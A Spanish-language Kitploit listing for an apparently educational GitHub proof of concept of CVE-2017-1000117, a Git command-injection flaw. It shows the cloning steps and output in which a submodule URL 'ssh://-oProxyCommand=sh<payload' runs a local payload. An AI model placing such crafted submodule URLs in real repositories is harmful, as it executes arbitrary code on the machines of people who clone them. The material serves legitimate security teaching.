Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2017-1000117 — CVE-2017-1000117 reproducción de vulnerabilidad (PoC+Exp) | Kitploit
Herramientas/GitHubGitHub/anonymking/cve-2017-1000117
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónLabs y Práctica
GitHubanonymking/cve-2017-1000117

CVE-2017-1000117

CVE-2017-1000117 reproducción de vulnerabilidad (PoC+Exp)

Ver Repositorio
32hace 7 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2017-1000117

Descripción del proyecto

  • Uno de los temas seleccionados para el diseño del curso de seguridad en redes.
  • Reproducción de la vulnerabilidad CVE-2017-1000117 (PoC+Exp)
  • Git + SSH

Resumen de la vulnerabilidad:

  • Nombre de la vulnerabilidad: Vulnerabilidad de inyección de comandos Git
  • ID CNNVD: CNNVD-201708-670
  • Nivel de peligro: Medio
  • ID CVE: CVE-2017-1000117
  • Tipo de vulnerabilidad: Inyección de comandos
  • Fecha de publicación: 2017-08-16
  • Tipo de amenaza: Remota
  • Fecha de actualización: 2017-10-17
  • Proveedor: git-scm
  • Fuente de la vulnerabilidad: TrevorJay
  • Resumen: Git es un sistema de control de versiones distribuido gratuito y de código abierto desarrollado por el desarrollador de software estadounidense Linus Torvalds. Existe una vulnerabilidad de comandos en versiones anteriores a Git 2.7.5. Los atacantes remotos pueden explotar esta vulnerabilidad mediante una URL especialmente diseñada 'ssh://...' para ejecutar programas arbitrarios en el dispositivo remoto.

Proceso de explotación

  • Instalar una versión de Git dentro del rango de la vulnerabilidad (Git para Linux, Git para Windows)
  • Aquí elegí la versión git-2.12.1 (probada en Linux y Windows, ambas funcionales) (Las direcciones de descarga para la versión 2.12.1 en Linux y Windows son respectivamente git-2.12.1.tar.gz, Git-2.12.1-64-bit.tar.bz2)
  • Una vez instalado Git, clone el proyecto incluyendo los submódulos: git clone --recursive https://github.com/AnonymKing/CVE-2017-1000117.git
root@kitploit:~
$ git clone --recursive https://github.com/AnonymKing/CVE-2017-1000117.git
Cloning into 'CVE-2017-1000117'...
remote: Enumerating objects: 14, done.
remote: Counting objects: 100% (14/14), done.
remote: Compressing objects: 100% (13/13), done.
remote: Total 14 (delta 3), reused 8 (delta 0), pack-reused 0
Unpacking objects: 100% (14/14), done.
Submodule 'exploit' (ssh://-oProxyCommand=sh<payload /exploit) registered for path 'exploit'
Cloning into 'C:/Users/AnonymKing/Desktop/Git-2.12.1-64-bit/test/CVE-2017-1000117/exploit'...
Pseudo-terminal will not be allocated because stdin is not a terminal.


*********************************************
                   _ooOoo_
                  o8888888o
                  88" . "88
                  (| -_- |)
                  O\  =  /O
               ____/`---'\____
             .'  \\|     |//  `.
            /  \\|||  :  |||//  \
           /  _||||| -:- |||||-  \
           |   | \\\  -  /// |   |
           | \_|  ''\---/''  |   |
           \  .-\__  `-`  ___/-. /
         ___`. .'  /--.--\  `. . __
      ."" '&lt;  `.___\_&lt;|>_/___.'  >'"".
     | | :  `- \`.;`\ _ /`;.`/ - ` : | |
     \  \ `-.   \_ __\ /__ _/   .-` /  /
======`-.____`-.___\_____/___.-`____.-'======
                   `=---='
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

ssh_exchange_identification: Connection closed by remote host
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
fatal: clone of 'ssh://-oProxyCommand=sh<payload /exploit' into submodule path 'C:/Users/AnonymKing/Desktop/Git-2.12.1-64-bit/test/CVE-2017-1000117/exploit' failed
Failed to clone 'exploit'. Retry scheduled
  • Cuando veas al Buda, la vulnerabilidad ya ha sido reproducida, y el código malicioso en el payload se ha ejecutado con éxito.

Actualización 2019/06/21 10:30

  • Al escribir el informe, de repente descubrí que esta vulnerabilidad es muy similar a CVE-2018-17456, solo que expresada de otra manera; ambas tienen su origen en la incapacidad de analizar correctamente el símbolo "-", interpretándolo erróneamente como un parámetro, lo que provoca la ejecución de código arbitrario.
  • Sobre la explotación de la vulnerabilidad CVE-2018-17456, se puede consultar este artículo: [《Análisis de la vulnerabilidad de Git Submodule (CVE-2018-17456)》](https://paper.seebug.org/716/](https://paper.seebug.org/716/)

Actualización 2019/06/21 19:39

  • Al buscar información relacionada, encontré una vulnerabilidad muy similar CVE-2018-11235.
  • Sobre la vulnerabilidad CVE-2018-11235, aquí hay algunos artículos de referencia: RCE de git CVE-2018-11235, Exploit PoC para CVE-2018-11235, Análisis detallado de la vulnerabilidad de ejecución remota de código en Git (CVE-2018-11235)
Descargar herramienta